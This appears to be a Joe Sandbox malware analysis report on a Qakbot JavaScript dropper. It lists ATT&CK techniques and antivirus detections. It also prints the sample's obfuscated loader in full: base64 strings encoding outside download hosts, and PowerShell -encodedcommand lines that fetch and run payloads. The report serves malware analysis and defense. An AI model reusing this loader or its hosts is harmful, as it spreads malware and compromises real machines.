Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: powershell.exe, 00000003.00000002.965436092.0000021D7D204000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

HIPS / PFW / Operating System Protection Evasion

barindex
Encrypted powershell cmdline option found
Source: C:\Windows\System32\wscript.exeProcess created: Base64 decoded $avantlay = "aAB0AHQAcABzADoALwAvAGMAbwByAG4AaQBmAGkAYwAuAGMAYQBzAGEAannpaAB0AHQAcABzADoALwAvADYAMwAuADIANQAwAC4AMQA2ADkALgA1ADcAannpaAB0AHQAcABzADoALwAvAFIAYQB1AG4AYwBoAGkAZQByAC4AZwBhAG0AZQBzAA==annpaAB0AHQAcABzADoALwAvADcAMwAuADYAMwAuADQANgAuADEAMwA5AA==";$fletches = "aAB0AHQAcABzADoALwAvAFcAbwBhAGQAZQByAFAAaABhAG4AZQByAG8AZwBhAG0AaQBhAC4AbABpAG4AawA=";$QuizzeeDecelerometer = "aAB0AHQAcAA6AC8ALwAxADEANQAuADEANgA4AC4ANgAzAC4AMgAxADMA";$immarcescible = "aAB0AHQAcAA6AC8ALwAxADUAMQAuADEAMQA3AC4AMQA1ADUALgA3ADQALwB6AEQAMgBkAEIALwB3ADQATQA=QaAB0AHQAcAA6AC8ALwAxADkAMAAuADkANwAuADEAMwA2AC4ANAA1AC8ATgBNAEIATAAvAGEARQB5AE4AbwA=QaAB0AHQAcAA6AC8ALwA4ADkALgA4ADIALgA1ADIALgA2ADUALwAyAGYALwBTAA==QaAB0AHQAcAA6AC8ALwAxADkAMgAuADEAMgAxAC4AMgAzAC4AMQAwADQALwBUAEwARwBoAE4AZAAvAEwAZABXAGQARABGAA==QaAB0AHQAcAA6AC8ALwAxADkAMgAuADEAMgAxAC4AMgAzAC4ANgAxAC8AOQBhADYANwBwAGUAcwAvAHgAaABZAHgAdABRADAASQA=QaAB0AHQAcAA6AC8ALwAxADQAOQAuADEANQA0AC4AMQA1ADkALgA5ADgALwBQAHAAVQBZAFgALwA4AEYANQBNADUANwBBAEoAZAA5AGIAMwA=";foreach ($Tenaille in $immarcescible -split "Q") {try {$Artificialities = "aAB0AHQAcAA6AC8ALwAxADUAOQAuADEAMgA2AC4AMgA0ADYALgA5ADYA";$hydraulicCappadocian = "aAB0AHQAcABzADoALwAvADcAMQAuADEANAAwAC4AMQA0ADIALgAyADQAMAA=IaAB0AHQAcABzADoALwAvADEANAAzAC4AMQA3ADQALgAxADkANQAuADEANQAyAA==IaAB0AHQAcAA6AC8ALwBCAGwAbwBjAGsAcABhAHQAZQAuAHMAdQBwAHAAbAB5AA==IaAB0AHQAcABzADoALwAvADIAMQA0AC4AMgAwADgALgA0ADIALgA5ADAA";$imbricately = "aAB0AHQAcAA6AC8ALwBxAHUAaQBkAGEAbQAuAGUAbgBnAGkAbgBlAGUAcgBpAG4AZwA=
Source: C:\Windows\System32\wscript.exeProcess created: Base64 decoded $avantlay = "aAB0AHQAcABzADoALwAvAGMAbwByAG4AaQBmAGkAYwAuAGMAYQBzAGEAannpaAB0AHQAcABzADoALwAvADYAMwAuADIANQAwAC4AMQA2ADkALgA1ADcAannpaAB0AHQAcABzADoALwAvAFIAYQB1AG4AYwBoAGkAZQByAC4AZwBhAG0AZQBzAA==annpaAB0AHQAcABzADoALwAvADcAMwAuADYAMwAuADQANgAuADEAMwA5AA==";$fletches = "aAB0AHQAcABzADoALwAvAFcAbwBhAGQAZQByAFAAaABhAG4AZQByAG8AZwBhAG0AaQBhAC4AbABpAG4AawA=";$QuizzeeDecelerometer = "aAB0AHQAcAA6AC8ALwAxADEANQAuADEANgA4AC4ANgAzAC4AMgAxADMA";$immarcescible = "aAB0AHQAcAA6AC8ALwAxADUAMQAuADEAMQA3AC4AMQA1ADUALgA3ADQALwB6AEQAMgBkAEIALwB3ADQATQA=QaAB0AHQAcAA6AC8ALwAxADkAMAAuADkANwAuADEAMwA2AC4ANAA1AC8ATgBNAEIATAAvAGEARQB5AE4AbwA=QaAB0AHQAcAA6AC8ALwA4ADkALgA4ADIALgA1ADIALgA2ADUALwAyAGYALwBTAA==QaAB0AHQAcAA6AC8ALwAxADkAMgAuADEAMgAxAC4AMgAzAC4AMQAwADQALwBUAEwARwBoAE4AZAAvAEwAZABXAGQARABGAA==QaAB0AHQAcAA6AC8ALwAxADkAMgAuADEAMgAxAC4AMgAzAC4ANgAxAC8AOQBhADYANwBwAGUAcwAvAHgAaABZAHgAdABRADAASQA=QaAB0AHQAcAA6AC8ALwAxADQAOQAuADEANQA0AC4AMQA1ADkALgA5ADgALwBQAHAAVQBZAFgALwA4AEYANQBNADUANwBBAEoAZAA5AGIAMwA=";foreach ($Tenaille in $immarcescible -split "Q") {try {$Artificialities = "aAB0AHQAcAA6AC8ALwAxADUAOQAuADEAMgA2AC4AMgA0ADYALgA5ADYA";$hydraulicCappadocian = "aAB0AHQAcABzADoALwAvADcAMQAuADEANAAwAC4AMQA0ADIALgAyADQAMAA=IaAB0AHQAcABzADoALwAvADEANAAzAC4AMQA3ADQALgAxADkANQAuADEANQAyAA==IaAB0AHQAcAA6AC8ALwBCAGwAbwBjAGsAcABhAHQAZQAuAHMAdQBwAHAAbAB5AA==IaAB0AHQAcABzADoALwAvADIAMQA0AC4AMgAwADgALgA0ADIALgA5ADAA";$imbricately = "aAB0AHQAcAA6AC8ALwBxAHUAaQBkAGEAbQAuAGUAbgBnAGkAbgBlAGUAcgBpAG4AZwA=
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe" -encodedcommand "jabhahyayqbuahqababhahkaiaa9acaaigbhaeeaqgawaeeasabraeeaywbbaeiaegbbaeqabwbbaewadwbbahyaqqbhae0aqqbiahcaqgb5aeearwa0aeeayqbraeiabqbbaecaawbbafkadwbbahuaqqbhae0aqqbzafeaqgb6aeearwbfaeeayqbuag4acabhaeeaqgawaeeasabraeeaywbbaeiaegbbaeqabwbbaewadwbbahyaqqbeafkaqqbnahcaqqb1aeearabjaeeatgbraeeadwbbaemanabbae0auqbbadiaqqbeagsaqqbmagcaqqaxaeearabjaeeayqbuag4acabhaeeaqgawaeeasabraeeaywbbaeiaegbbaeqabwbbaewadwbbahyaqqbgaekaqqbzafeaqgaxaeearwa0aeeawqb3aeiabwbbaecaawbbafoauqbcahkaqqbdadqaqqbaahcaqgboaeearwawaeeawgbraeiaegbbaeeapqa9ageabgbuahaayqbbaeiamabbaegauqbbagmaqqbcahoaqqbeag8aqqbmahcaqqb2aeearabjaeeatqb3aeeadqbbaeqawqbbae0adwbbahuaqqbeafeaqqboagcaqqb1aeearabfaeeatqb3aeeanqbbaeeapqa9aciaowakagyabablahqaywboaguacwagad0aiaaiageaqqbcadaaqqbiafeaqqbjaeeaqgb6aeearabvaeeatab3aeeadgbbaeyaywbbagiadwbcaggaqqbhafeaqqbaafeaqgb5aeeargbbaeeayqbbaeiaaabbaecanabbafoauqbcahkaqqbhadgaqqbaahcaqgboaeearwawaeeayqbraeiaaabbaemanabbagiaqqbcahaaqqbhadqaqqbhahcaqqa9aciaowakafeadqbpahoaegblaguarablagmazqbsaguacgbvag0azqb0aguacgagad0aiaaiageaqqbcadaaqqbiafeaqqbjaeeaqqa2aeeaqwa4aeeatab3aeeaeabbaeqarqbbae4auqbbahuaqqbeaeuaqqboagcaqqa0aeeaqwa0aeeatgbnaeeaegbbaemanabbae0azwbbahgaqqbeae0aqqaiadsajabpag0abqbhahiaywblahmaywbpagiabablacaapqagaciayqbbaeiamabbaegauqbbagmaqqbbadyaqqbdadgaqqbmahcaqqb4aeearabvaeeatqbraeeadqbbaeqarqbbae0auqbbadmaqqbdadqaqqbnafeaqqaxaeearabvaeeatabnaeeamwbbaeqauqbbaewadwbcadyaqqbfafeaqqbnagcaqgbraeearqbjaeeatab3aeiamwbbaeqauqbbafqauqbbad0auqbhaeeaqgawaeeasabraeeaywbbaeeangbbaemaoabbaewadwbbahgaqqbeagsaqqbnaeeaqqb1aeearabraeeatgb3aeeadqbbaeqarqbbae0adwbbadiaqqbdadqaqqboaeeaqqaxaeeaqwa4aeeavabnaeiatgbbaeuasqbbafqaqqbbahyaqqbhaeuaqqbsafeaqga1aeearqa0aeeaygb3aeeapqbrageaqqbcadaaqqbiafeaqqbjaeeaqqa2aeeaqwa4aeeatab3aeeanabbaeqaawbbaewazwbbadqaqqbeaekaqqbmagcaqqaxaeearabjaeeatabnaeeamgbbaeqavqbbaewadwbbahkaqqbhafkaqqbmahcaqgbuaeeaqqa9ad0auqbhaeeaqgawaeeasabraeeaywbbaeeangbbaemaoabbaewadwbbahgaqqbeagsaqqbnagcaqqb1aeearabfaeeatqbnaeeaeabbaemanabbae0azwbbahoaqqbdadqaqqbnafeaqqb3aeearabraeeatab3aeiavqbbaeuadwbbafiadwbcag8aqqbfadqaqqbaaeeaqqb2aeearqb3aeeawgbbaeiawabbaecauqbbafiaqqbcaecaqqbbad0apqbrageaqqbcadaaqqbiafeaqqbjaeeaqqa2aeeaqwa4aeeatab3aeeaeabbaeqaawbbae0azwbbahuaqqbeaeuaqqbnagcaqqb4aeeaqwa0aeeatqbnaeeaegbbaemanabbae4azwbbahgaqqbdadgaqqbpafeaqgboaeearabzaeeatgb3aeiadwbbaecavqbbagmadwbbahyaqqbiagcaqqbhaeeaqgbaaeeasabnaeeazabbaeiaugbbaeqaqqbbafmauqbbad0auqbhaeeaqgawaeeasabraeeaywbbaeeangbbaemaoabbaewadwbbahgaqqbeafeaqqbpafeaqqb1aeearabfaeeatgbraeeamabbaemanabbae0auqbbadeaqqbeagsaqqbmagcaqqa1aeearabnaeeatab3aeiauqbbaegaqqbbafyauqbcafoaqqbgagcaqqbmahcaqqa0aeearqbzaeeatgbraeiatgbbaeqavqbbae4adwbcaeiaqqbfag8aqqbaaeeaqqa1aeearwbjaeeatqb3aeeapqaiadsazgbvahiazqbhagmaaaagacgajabuaguabgbhagkababsaguaiabpag4aiaakagkabqbtageacgbjaguacwbjagkaygbsaguaiaatahmacabsagkadaagaciauqaiackaiab7ahqacgb5acaaewakaeeacgb0agkazgbpagmaaqbhagwaaqb0agkazqbzacaapq
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe" -encodedcommand "jabhahyayqbuahqababhahkaiaa9acaaigbhaeeaqgawaeeasabraeeaywbbaeiaegbbaeqabwbbaewadwbbahyaqqbhae0aqqbiahcaqgb5aeearwa0aeeayqbraeiabqbbaecaawbbafkadwbbahuaqqbhae0aqqbzafeaqgb6aeearwbfaeeayqbuag4acabhaeeaqgawaeeasabraeeaywbbaeiaegbbaeqabwbbaewadwbbahyaqqbeafkaqqbnahcaqqb1aeearabjaeeatgbraeeadwbbaemanabbae0auqbbadiaqqbeagsaqqbmagcaqqaxaeearabjaeeayqbuag4acabhaeeaqgawaeeasabraeeaywbbaeiaegbbaeqabwbbaewadwbbahyaqqbgaekaqqbzafeaqgaxaeearwa0aeeawqb3aeiabwbbaecaawbbafoauqbcahkaqqbdadqaqqbaahcaqgboaeearwawaeeawgbraeiaegbbaeeapqa9ageabgbuahaayqbbaeiamabbaegauqbbagmaqqbcahoaqqbeag8aqqbmahcaqqb2aeearabjaeeatqb3aeeadqbbaeqawqbbae0adwbbahuaqqbeafeaqqboagcaqqb1aeearabfaeeatqb3aeeanqbbaeeapqa9aciaowakagyabablahqaywboaguacwagad0aiaaiageaqqbcadaaqqbiafeaqqbjaeeaqgb6aeearabvaeeatab3aeeadgbbaeyaywbbagiadwbcaggaqqbhafeaqqbaafeaqgb5aeeargbbaeeayqbbaeiaaabbaecanabbafoauqbcahkaqqbhadgaqqbaahcaqgboaeearwawaeeayqbraeiaaabbaemanabbagiaqqbcahaaqqbhadqaqqbhahcaqqa9aciaowakafeadqbpahoaegblaguarablagmazqbsaguacgbvag0azqb0aguacgagad0aiaaiageaqqbcadaaqqbiafeaqqbjaeeaqqa2aeeaqwa4aeeatab3aeeaeabbaeqarqbbae4auqbbahuaqqbeaeuaqqboagcaqqa0aeeaqwa0aeeatgbnaeeaegbbaemanabbae0azwbbahgaqqbeae0aqqaiadsajabpag0abqbhahiaywblahmaywbpagiabablacaapqagaciayqbbaeiamabbaegauqbbagmaqqbbadyaqqbdadgaqqbmahcaqqb4aeearabvaeeatqbraeeadqbbaeqarqbbae0auqbbadmaqqbdadqaqqbnafeaqqaxaeearabvaeeatabnaeeamwbbaeqauqbbaewadwbcadyaqqbfafeaqqbnagcaqgbraeearqbjaeeatab3aeiamwbbaeqauqbbafqauqbbad0auqbhaeeaqgawaeeasabraeeaywbbaeeangbbaemaoabbaewadwbbahgaqqbeagsaqqbnaeeaqqb1aeearabraeeatgb3aeeadqbbaeqarqbbae0adwbbadiaqqbdadqaqqboaeeaqqaxaeeaqwa4aeeavabnaeiatgbbaeuasqbbafqaqqbbahyaqqbhaeuaqqbsafeaqga1aeearqa0aeeaygb3aeeapqbrageaqqbcadaaqqbiafeaqqbjaeeaqqa2aeeaqwa4aeeatab3aeeanabbaeqaawbbaewazwbbadqaqqbeaekaqqbmagcaqqaxaeearabjaeeatabnaeeamgbbaeqavqbbaewadwbbahkaqqbhafkaqqbmahcaqgbuaeeaqqa9ad0auqbhaeeaqgawaeeasabraeeaywbbaeeangbbaemaoabbaewadwbbahgaqqbeagsaqqbnagcaqqb1aeearabfaeeatqbnaeeaeabbaemanabbae0azwbbahoaqqbdadqaqqbnafeaqqb3aeearabraeeatab3aeiavqbbaeuadwbbafiadwbcag8aqqbfadqaqqbaaeeaqqb2aeearqb3aeeawgbbaeiawabbaecauqbbafiaqqbcaecaqqbbad0apqbrageaqqbcadaaqqbiafeaqqbjaeeaqqa2aeeaqwa4aeeatab3aeeaeabbaeqaawbbae0azwbbahuaqqbeaeuaqqbnagcaqqb4aeeaqwa0aeeatqbnaeeaegbbaemanabbae4azwbbahgaqqbdadgaqqbpafeaqgboaeearabzaeeatgb3aeiadwbbaecavqbbagmadwbbahyaqqbiagcaqqbhaeeaqgbaaeeasabnaeeazabbaeiaugbbaeqaqqbbafmauqbbad0auqbhaeeaqgawaeeasabraeeaywbbaeeangbbaemaoabbaewadwbbahgaqqbeafeaqqbpafeaqqb1aeearabfaeeatgbraeeamabbaemanabbae0auqbbadeaqqbeagsaqqbmagcaqqa1aeearabnaeeatab3aeiauqbbaegaqqbbafyauqbcafoaqqbgagcaqqbmahcaqqa0aeearqbzaeeatgbraeiatgbbaeqavqbbae4adwbcaeiaqqbfag8aqqbaaeeaqqa1aeearwbjaeeatqb3aeeapqaiadsazgbvahiazqbhagmaaaagacgajabuaguabgbhagkababsaguaiabpag4aiaakagkabqbtageacgbjaguacwbjagkaygbsaguaiaatahmacabsagkadaagaciauqaiackaiab7ahqacgb5acaaewakaeeacgb0agkazgbpagmaaqbhagwaaqb0agkazqbzacaapq
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" "C:\ProgramData\WeigelasScribbleable.js" ProtopathicCosmographically pachisisCounterproductiveness KnowingestGemmer theoreticianRoundishness
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedcommand "JABhAHYAYQBuAHQAbABhAHkAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBHAE0AQQBiAHcAQgB5AEEARwA0AEEAYQBRAEIAbQBBAEcAawBBAFkAdwBBAHUAQQBHAE0AQQBZAFEAQgB6AEEARwBFAEEAYQBuAG4AcABhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAFkAQQBNAHcAQQB1AEEARABJAEEATgBRAEEAdwBBAEMANABBAE0AUQBBADIAQQBEAGsAQQBMAGcAQQAxAEEARABjAEEAYQBuAG4AcABhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBGAEkAQQBZAFEAQgAxAEEARwA0AEEAWQB3AEIAbwBBAEcAawBBAFoAUQBCAHkAQQBDADQAQQBaAHcAQgBoAEEARwAwAEEAWgBRAEIAegBBAEEAPQA9AGEAbgBuAHAAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABjAEEATQB3AEEAdQBBAEQAWQBBAE0AdwBBAHUAQQBEAFEAQQBOAGcAQQB1AEEARABFAEEATQB3AEEANQBBAEEAPQA9ACIAOwAkAGYAbABlAHQAYwBoAGUAcwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEYAYwBBAGIAdwBCAGgAQQBHAFEAQQBaAFEAQgB5AEEARgBBAEEAYQBBAEIAaABBAEcANABBAFoAUQBCAHkAQQBHADgAQQBaAHcAQgBoAEEARwAwAEEAYQBRAEIAaABBAEMANABBAGIAQQBCAHAAQQBHADQAQQBhAHcAQQA9ACIAOwAkAFEAdQBpAHoAegBlAGUARABlAGMAZQBsAGUAcgBvAG0AZQB0AGUAcgAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQARQBBAE4AUQBBAHUAQQBEAEUAQQBOAGcAQQA0AEEAQwA0AEEATgBnAEEAegBBAEMANABBAE0AZwBBAHgAQQBEAE0AQQAiADsAJABpAG0AbQBhAHIAYwBlAHMAYwBpAGIAbABlACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABVAEEATQBRAEEAdQBBAEQARQBBAE0AUQBBADMAQQBDADQAQQBNAFEAQQAxAEEARABVAEEATABnAEEAMwBBAEQAUQBBAEwAdwBCADYAQQBFAFEAQQBNAGcAQgBrAEEARQBJAEEATAB3AEIAMwBBAEQAUQBBAFQAUQBBAD0AUQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAGsAQQBNAEEAQQB1AEEARABrAEEATgB3AEEAdQBBAEQARQBBAE0AdwBBADIAQQBDADQAQQBOAEEAQQAxAEEAQwA4AEEAVABnAEIATgBBAEUASQBBAFQAQQBBAHYAQQBHAEUAQQBSAFEAQgA1AEEARQA0AEEAYgB3AEEAPQBRAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEANABBAEQAawBBAEwAZwBBADQAQQBEAEkAQQBMAGcAQQAxAEEARABJAEEATABnAEEAMgBBAEQAVQBBAEwAdwBBAHkAQQBHAFkAQQBMAHcAQgBUAEEAQQA9AD0AUQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAGsAQQBNAGcAQQB1AEEARABFAEEATQBnAEEAeABBAEMANABBAE0AZwBBAHoAQQBDADQAQQBNAFEAQQB3AEEARABRAEEATAB3AEIAVQBBAEUAdwBBAFIAdwBCAG8AQQBFADQAQQBaAEEAQQB2AEEARQB3AEEAWgBBAEIAWABBAEcAUQBBAFIAQQBCAEcAQQBBAD0APQBRAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAawBBAE0AZwBBAHUAQQBEAEUAQQBNAGcAQQB4AEEAQwA0AEEATQBnAEEAegBBAEMANABBAE4AZwBBAHgAQQBDADgAQQBPAFEAQgBoAEEARABZAEEATgB3AEIAdwBBAEcAVQBBAGMAdwBBAHYAQQBIAGcAQQBhAEEAQgBaAEEASABnAEEAZABBAEIAUgBBAEQAQQBBAFMAUQBBAD0AUQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFEAQQBPAFEAQQB1AEEARABFAEEATgBRAEEAMABBAEMANABBAE0AUQBBADEAQQBEAGsAQQBMAGcAQQA1AEEARABnAEEATAB3AEIAUQBBAEgAQQBBAFYAUQBCAFoAQQBGAGcAQQBMAHcAQQA0AEEARQBZAEEATgBRAEIATgBBAEQAVQBBAE4AdwBCAEIAQQBFAG8AQQBaAEEAQQA1AEEARwBJAEEATQB3AEEAPQAiADsAZgBvAHIAZQBhAGMAaAAgACgAJABUAGUAbgBhAGkAbABsAGUAIABpAG4AIAAkAGkAbQBtAGEAcgBjAGUAcwBjAGkAYgBsAGUAIAAtAHMAcABsAGkAdAAgACIAUQAiACkAIAB7AHQAcgB5ACAAewAkAEEAcgB0AGkAZgBpAGMAaQBhAGwAaQB0AGkAZQBzACAAPQ
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid Accounts11
Command and Scripting Interpreter		Path Interception11
Process Injection		1
Masquerading		OS Credential Dumping1
Security Software Discovery		Remote ServicesData from Local SystemExfiltration Over Other Network MediumData ObfuscationEavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default Accounts22
Scripting		Boot or Logon Initialization ScriptsBoot or Logon Initialization Scripts21
Virtualization/Sandbox Evasion		LSASS Memory1
Process Discovery		Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothJunk DataExploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain Accounts2
PowerShell		Logon Script (Windows)Logon Script (Windows)11
Process Injection		Security Account Manager21
Virtualization/Sandbox Evasion		SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationSteganographyExploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
Deobfuscate/Decode Files or Information		NTDS1
Application Window Discovery		Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script22
Scripting		LSA Secrets1
Remote System Discovery		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaLaunchdRc.commonRc.common1
Obfuscated Files or Information		Cached Domain Credentials1
File and Directory Discovery		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSync12
System Information Discovery		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
Semischolastica.js14%ReversingLabsScript-JS.Trojan.Cryxos
Semischolastica.js31%VirustotalBrowse
Semischolastica.js100%AviraJS/Qakbot.G

Dropped Files

SourceDetectionScannerLabelLink
C:\ProgramData\WeigelasScribbleable.js100%AviraJS/Qakbot.G

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
https://go.micro0%URL Reputationsafe
https://go.micro0%URL Reputationsafe
https://contoso.com/0%URL Reputationsafe
https://contoso.com/License0%URL Reputationsafe
https://contoso.com/Icon0%URL Reputationsafe

Domains and IPs

Contacted Domains

No contacted domains info

URLs from Memory and Binaries

NameSourceMaliciousAntivirus DetectionReputation
http://nuget.org/NuGet.exepowershell.exe, 00000003.00000002.962884479.0000021D75007000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.962884479.0000021D7514A000.00000004.00000800.00020000.00000000.sdmpfalse
    		high
    https://github.com/imaya/zlib.jswscript.exe, 00000000.00000003.576624721.000001CC97AFE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.576968524.000001CC99F11000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.579865423.000001CC99B10000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.579593243.000001CC99A00000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000002.592556553.0000017FB91B0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000002.592773841.0000017FB92B0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.590632857.0000017FB96B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.582806752.0000017FB72FD000.00000004.00000020.00020000.00000000.sdmp, Semischolastica.js, WeigelasScribbleable.js.0.drfalse
      		high
      http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000003.00000002.942982234.0000021D651B0000.00000004.00000800.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      		unknown
      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000003.00000002.942982234.0000021D64FA1000.00000004.00000800.00020000.00000000.sdmpfalse
        		high
        http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000003.00000002.942982234.0000021D651B0000.00000004.00000800.00020000.00000000.sdmpfalse
          		high
          https://go.micropowershell.exe, 00000003.00000002.942982234.0000021D66B29000.00000004.00000800.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          • URL Reputation: safe
          		unknown
          https://github.com/Pester/Pesterpowershell.exe, 00000003.00000002.942982234.0000021D651B0000.00000004.00000800.00020000.00000000.sdmpfalse
            		high
            https://contoso.com/powershell.exe, 00000003.00000002.962884479.0000021D7514A000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            https://nuget.org/nuget.exepowershell.exe, 00000003.00000002.962884479.0000021D75007000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.962884479.0000021D7514A000.00000004.00000800.00020000.00000000.sdmpfalse
              		high
              https://contoso.com/Licensepowershell.exe, 00000003.00000002.962884479.0000021D7514A000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              https://contoso.com/Iconpowershell.exe, 00000003.00000002.962884479.0000021D7514A000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown

              World Map of Contacted IPs

              No contacted IP infos

              General Information

              Joe Sandbox Version:37.1.0 Beryl
              Analysis ID:876155
              Start date and time:2023-05-26 11:25:36 +02:00
              Joe Sandbox Product:CloudBasic
              Overall analysis duration:0h 7m 56s
              Hypervisor based Inspection enabled:false
              Report type:light
              Cookbook file name:default.jbs
              Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
              Number of analysed new started processes analysed:5
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:0
              Technologies:
              • HCA enabled
              • EGA enabled
              • HDC enabled
              • AMSI enabled
              Analysis Mode:default
